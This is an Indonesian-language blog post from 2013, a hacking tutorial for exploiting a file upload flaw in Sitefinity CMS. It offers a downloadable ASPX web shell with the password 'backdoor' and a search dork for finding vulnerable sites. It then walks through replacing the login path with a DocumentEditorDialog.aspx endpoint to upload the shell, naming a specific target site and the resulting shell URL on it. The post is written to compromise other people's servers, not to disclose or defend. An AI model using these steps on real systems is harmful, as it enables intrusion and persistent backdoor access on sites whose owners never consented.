Selasa, 24 Desember 2013
Home » Unlabelled » SITEFINITY CMS ASP.NET FILE UPLOAD VULNERABILITY
02.44
0 komentar

SITEFINITY CMS ASP.NET FILE UPLOAD VULNERABILITY

hallo mber kali ini admin akan share tutor lagi :)
langsung aja ya

 Shell aspx : [ Download ] password shell : backdoor
Dork : "Sitefinity: Login"

Target : http://www.cyberwolf-software.com/sitefinity/login.aspx

Exploit :
/sitefinity/login.aspx
ganti dengan
/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
lalu klik Select ) untuk upload shell, ingat upload shell yang .aspx tadi soalnya ini web berbasis ASP.Net
lalu klik "Upload selected"
Lihat gambar dibawah :
lalu klik "Insert"
jika sudah check di
lalu menuju Penyimpanan shell :

target.com/Files/shell.aspx
http://www.cyberwolf-software.com/Files/wksid.aspx
Taraa shell aspx nya sudah tertanam :)

source : http://blog.suram-crew.info/2013/11/cms-sitefinity-file-upload-vulnerability.html
di 02.44
Share:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)